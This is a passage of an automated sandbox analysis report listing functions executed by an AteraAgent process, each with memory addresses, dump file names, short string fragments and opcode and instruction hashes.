                                                                                                                                                                                                                                          • Instruction ID: 5ecb18e59b4c521d39f714af645f8cb6780a5c46cc5dc8ef345e591157058254
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25bb8f3672bcdd1527747db7f45a342a5fe149efeafa1353984406d98f5eeda4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CD0127514B1C92FE35266B4852159A7FE09F02250F8D44D8D944470A3D5AD1D468311
                                                                                                                                                                                                                                          Function 00007FFD9B3D6E93 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1985428202.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b3d0000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                          • Instruction ID: 8fdbb167c496f42a258d5c55ce512b92a0f4082fa2ec1adbcab7ed66bb3e34b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CA00252BCF46E01D45470DD78620D8B244C7C5171BC66A76ED1C8415A989F1AD60285

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FFD9B42900E Relevance: 2.0, Strings: 1, Instructions: 717COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: |O_H
                                                                                                                                                                                                                                          • API String ID: 0-1045398268
                                                                                                                                                                                                                                          • Opcode ID: 3b96534099d8037dc896ac648a43fb1f81e80d378f567d7f654dd9fc3f2e984d
                                                                                                                                                                                                                                          • Instruction ID: a631a254be0d3ac128aaa22da1da39ce118b7317a557fc44f8f0bbb60dde679f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b96534099d8037dc896ac648a43fb1f81e80d378f567d7f654dd9fc3f2e984d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1423D71A0E7CA4FEB7587E4846D6A43BE0EF96318F0605FDC48D8B1B3DA286905E741
                                                                                                                                                                                                                                          Function 00007FFD9B433870 Relevance: 1.9, Strings: 1, Instructions: 634COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: I_H
                                                                                                                                                                                                                                          • API String ID: 0-288374528
                                                                                                                                                                                                                                          • Opcode ID: 83817411258c394ba5eda2f57f04e904627d2d453a0d78d8554db64930a80073
                                                                                                                                                                                                                                          • Instruction ID: a97fd3c2bc3d525c8b1802e3933cfa7292bba75f47867510423e3762f0a3bcf3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83817411258c394ba5eda2f57f04e904627d2d453a0d78d8554db64930a80073
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66124B21B0EB4E4FE77597A484752B977E1EF46308F1A41BAC08AC71E3CD2D69429782
                                                                                                                                                                                                                                          Function 00007FFD9B410C7D Relevance: 1.2, Instructions: 1168COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f5a56425410cef1e667da85bdd0a9d165eea4fefbd11793bef5310939b8e6d0d
                                                                                                                                                                                                                                          • Instruction ID: fb2a52bb9f2b526cca77ec1ae66615bdb4a3625360caa1756f7cb23fc0c2f69b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a56425410cef1e667da85bdd0a9d165eea4fefbd11793bef5310939b8e6d0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82A21A70E1951D8FDBA9EF14C4A4BA9B3A2FF68308F5040F9D01ED7295DA35AA81CF50
                                                                                                                                                                                                                                          Function 00007FFD9B421CE0 Relevance: .4, Instructions: 434COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0ac27d9975006768f23ec52136f664c4c0be5503009acb44f5b89bba79ae6aa1
                                                                                                                                                                                                                                          • Instruction ID: e34e4a42a1c2d936e8805e90e0a9c73a9d3316715e5a66a019283d7d3a2015bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ac27d9975006768f23ec52136f664c4c0be5503009acb44f5b89bba79ae6aa1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14D15E21B1EB890FE76997F884656B67BE1EF96304F0542BAD08DC71E3DE186802D341
                                                                                                                                                                                                                                          Function 00007FFD9B42C910 Relevance: .4, Instructions: 381COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 007cbf36da8e21501de59e4e0d1b531abf28013f1ea3cef5a332bcbdd801fcef
                                                                                                                                                                                                                                          • Instruction ID: a4850adc85577185ab38e11a4fc771a967bdc410c6cc22e625b77f085b48f402
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 007cbf36da8e21501de59e4e0d1b531abf28013f1ea3cef5a332bcbdd801fcef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DB1B331B09A4D4FDF94EF9CC855AAA3BE1FFA9354B05017AE40DC32A2CA24ED41D780
                                                                                                                                                                                                                                          Function 00007FFD9B414C41 Relevance: .4, Instructions: 367COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 53258cae1d1dc02f4e979cf7e4605f81c0642083d2d70659e29d750f236da617
                                                                                                                                                                                                                                          • Instruction ID: d42e52c5338d671a6c1237bd4a7e82db7a795637d9423dc08f28d9588d70e20c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53258cae1d1dc02f4e979cf7e4605f81c0642083d2d70659e29d750f236da617
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5C1CF70E1960D8FEB64EF68D4647A973B2FF66304F1111B9D01DE72A2CA796D41CB80
                                                                                                                                                                                                                                          Function 00007FFD9B42B5E7 Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 83b29ecb9cbaf49c49b003f8e3f10e92504a0f7f48964a15f228de4a8efc0c09
                                                                                                                                                                                                                                          • Instruction ID: f049081d673ef9d65b5430b8bbd8e9f8a5aebf48c07f0faac7e4b39055485ea6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83b29ecb9cbaf49c49b003f8e3f10e92504a0f7f48964a15f228de4a8efc0c09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39B14A70E0961D8FDB68DF98C865BA8B7F1FF58304F1101AAD40DE32A2DA346A85DF40
                                                                                                                                                                                                                                          Function 00007FFD9B42B620 Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 116571b7df9c6e027a3051cb21180d4e9d48b8fa70e16a23086b7ea40ff728db
                                                                                                                                                                                                                                          • Instruction ID: 66890278235c3106bd6cb40900c140866c27d7834bd182c2955680ba2b689d71
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 116571b7df9c6e027a3051cb21180d4e9d48b8fa70e16a23086b7ea40ff728db
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A811A74E09A1D8FDB68DB98C855BACB7F1FF58304F0101A9D44DE72A2DA34AA85DF40
                                                                                                                                                                                                                                          Function 00007FFD9B414E45 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 10c0ef4a6c0bfc91042101c653f6c037c2ce999348defd3aa964fff9cc2038aa
                                                                                                                                                                                                                                          • Instruction ID: 505b3b5aad88336bf46d947be91ef71167be438f27af7e886ec46043a9f16379
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10c0ef4a6c0bfc91042101c653f6c037c2ce999348defd3aa964fff9cc2038aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28518B30E1A61D8FEB64EE68D4643A9B3B1EF66308F511179D009A72A2CB796D41DB80
                                                                                                                                                                                                                                          Function 00007FFD9B42CEED Relevance: 11.1, Strings: 8, Instructions: 1125COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: )$,$/$X$X$]$x$}
                                                                                                                                                                                                                                          • API String ID: 0-3461455369
                                                                                                                                                                                                                                          • Opcode ID: 2c8cfe18ee51275ce380b7d663bcad9acb79aaebf1cfea8ec8e47d7b744265e5
                                                                                                                                                                                                                                          • Instruction ID: d2f692382adcefa5394aa299767dd15dc8318546218569996ddef7db7e39df72
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c8cfe18ee51275ce380b7d663bcad9acb79aaebf1cfea8ec8e47d7b744265e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D629D20F0DA4D5FE769A77C48291B937D2EF8A314F1641BAD08EC71E7ED28AD429341
                                                                                                                                                                                                                                          Function 00007FFD9B6253A0 Relevance: 2.3, Strings: 1, Instructions: 1067COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2542562358.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: I8_H
                                                                                                                                                                                                                                          • API String ID: 0-2818897082
                                                                                                                                                                                                                                          • Opcode ID: a6f9f0c6fdc3a69f17b8835f4253a6f8f12d361a86a3eb4ba80862244a2cb870
                                                                                                                                                                                                                                          • Instruction ID: b6a4775c22d40f3ef236a1070c51608092439d729a329912d0c43edcb7337ff3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6f9f0c6fdc3a69f17b8835f4253a6f8f12d361a86a3eb4ba80862244a2cb870
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E72D431B2DA4A8FEBB8EB588065A69B7E1FF98300F550079E45DC72A6DE34FC418741
                                                                                                                                                                                                                                          Function 00007FFD9B42D304 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: dJ_H
                                                                                                                                                                                                                                          • API String ID: 0-2905161575
                                                                                                                                                                                                                                          • Opcode ID: e774034760d211428697ca8934c8e3c1898e2a378a03f4cc50260d31a772e20e
                                                                                                                                                                                                                                          • Instruction ID: be5b02f39e8c5a414b0cd4960018c5cae5cfcc013136687cb1c6149cb9daf8c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e774034760d211428697ca8934c8e3c1898e2a378a03f4cc50260d31a772e20e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D02F430A0DA494FDB69DB6CC8546B977E1FFA9304F05426AD48EC32A6DE34F842D781
                                                                                                                                                                                                                                          Function 00007FFD9B423B18 Relevance: 1.7, Strings: 1, Instructions: 432COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: dd7bb3c15cf5b033f17031dbff934408efb2aef98fff7448c6650247b5b612a9
                                                                                                                                                                                                                                          • Instruction ID: 3d52fd09b59d222f525790ac62c73b3aadcbac871796abc6aab4b8ca212776f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd7bb3c15cf5b033f17031dbff934408efb2aef98fff7448c6650247b5b612a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41D14430A1DB494FD728EB8CD4915B5B7E1FF95318B1446BDD18AC32AACA35F8428BC1
                                                                                                                                                                                                                                          Function 00007FFD9B42549D Relevance: 1.7, Strings: 1, Instructions: 421COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: J_^
                                                                                                                                                                                                                                          • API String ID: 0-3886167048
                                                                                                                                                                                                                                          • Opcode ID: 92d98998793196e756e222e42b758b7a3aaba88cd0c0611a0b8d58879e5db41b
                                                                                                                                                                                                                                          • Instruction ID: dbd76f69aa04738f196bc272576289a2f2c550c43fca90f8c4b5ec4c95a2d3d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92d98998793196e756e222e42b758b7a3aaba88cd0c0611a0b8d58879e5db41b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09B12C23B0FA9A0FF765A6AD68755F53BA0EF9236470941F7C089CB0A3DC04A9479390
                                                                                                                                                                                                                                          Function 00007FFD9B42447A Relevance: 1.7, Strings: 1, Instructions: 414COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 13596ee6741e9ff5cd0948dd3713b2998be12375cb00f95fd9e01904e073aa89
                                                                                                                                                                                                                                          • Instruction ID: e1085effde2eb5c725b4da6f158cc3138b7e0f144c33d298e074ed2bb8078e3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13596ee6741e9ff5cd0948dd3713b2998be12375cb00f95fd9e01904e073aa89
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AC15330A1DB894FEB69DB9C8460535B7E1FF95304B1506BED18AC32AACA35F842D781
                                                                                                                                                                                                                                          Function 00007FFD9B4203C5 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 92562e88440baad90ef7877fa55195c3a8fdbab6e65c4416df9410e5203ce08f
                                                                                                                                                                                                                                          • Instruction ID: bf2347a72d619d8d7ea5cb56bfa7ba151354198a2cf54025162a24badac339e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92562e88440baad90ef7877fa55195c3a8fdbab6e65c4416df9410e5203ce08f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80B1DE7071DB098FD768DB4CD4A1535B3E1FF98708B144A7DD08A836A6DA35F8439B81
                                                                                                                                                                                                                                          Function 00007FFD9B41A0A0 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 'Q_L
                                                                                                                                                                                                                                          • API String ID: 0-865484860
                                                                                                                                                                                                                                          • Opcode ID: cf7fbb38462dbf5455b0ac3ce41f09d2095e92fdcbbf2be2f785ade8330f4ce1
                                                                                                                                                                                                                                          • Instruction ID: a0062642d9152aa0b83cc94618bd1fa3dab1c939e148d85085a5b3d5e84a5ab4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf7fbb38462dbf5455b0ac3ce41f09d2095e92fdcbbf2be2f785ade8330f4ce1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB612662F18D0D0FEBA8EA6C946967933D2FFEC354B4501BAE44DC33A6DD29AD015381
                                                                                                                                                                                                                                          Function 00007FFD9B41D0C0 Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ^K_^
                                                                                                                                                                                                                                          • API String ID: 0-3349805252
                                                                                                                                                                                                                                          • Opcode ID: 437e2387f00faa25e98c707bb142d9163ab8493875d545e0346e34da33a54400
                                                                                                                                                                                                                                          • Instruction ID: 461b98083b0bd10f46332dd38cc884f7784555acd9f8a38b610f772820c2d90b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 437e2387f00faa25e98c707bb142d9163ab8493875d545e0346e34da33a54400
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A51B322A1D7954FD306B778A4B61D97BB1EF5223470942F7C089CB0E7E95C28868392
                                                                                                                                                                                                                                          Function 00007FFD9B4259D3 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: kq
                                                                                                                                                                                                                                          • API String ID: 0-1161455450
                                                                                                                                                                                                                                          • Opcode ID: b4c59ebedef42e5e7f8257df750407cfc84c3093019e13322d0b6b64915772d9
                                                                                                                                                                                                                                          • Instruction ID: 100835ae346bbeede3b2411ddfe5733083b5c84bbe7d466b043b59df56335e3b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4c59ebedef42e5e7f8257df750407cfc84c3093019e13322d0b6b64915772d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29416B22B1EA490FF769B3AC64726B13BE1EF96324B0901FBD099CB2E7CC095C454381
                                                                                                                                                                                                                                          Function 00007FFD9B41CDF3 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: vK_^
                                                                                                                                                                                                                                          • API String ID: 0-2721021717
                                                                                                                                                                                                                                          • Opcode ID: 7af91b21fbf1ede91a314dcd428d08130bb9e32a12e95bceca62c191203db170
                                                                                                                                                                                                                                          • Instruction ID: d32f01cc08c5bbb22c6b31955a2f452e41db656b7f2f3bc3023e3ee5538ba057
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7af91b21fbf1ede91a314dcd428d08130bb9e32a12e95bceca62c191203db170
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15412831F5DA0D5FE768DB5CACA95B937E1EFA9324B05417BE049C72A3CE10AC028781
                                                                                                                                                                                                                                          Function 00007FFD9B429634 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ya_H
                                                                                                                                                                                                                                          • API String ID: 0-994187556
                                                                                                                                                                                                                                          • Opcode ID: 01425789f18b1dec563964ff16d6c4f40c2c45e4f343ea8b6446335c86e3a672
                                                                                                                                                                                                                                          • Instruction ID: 652bdea615436372f97744d1fb07979cc53d66daffbe938575e0b2bc9d5a5333
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01425789f18b1dec563964ff16d6c4f40c2c45e4f343ea8b6446335c86e3a672
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01517A61B0E5894FEBA5D7AC84AC7A97BD1EF95304F4905FDC08CCB1B2DA24A906E301
                                                                                                                                                                                                                                          Function 00007FFD9B41CFF7 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
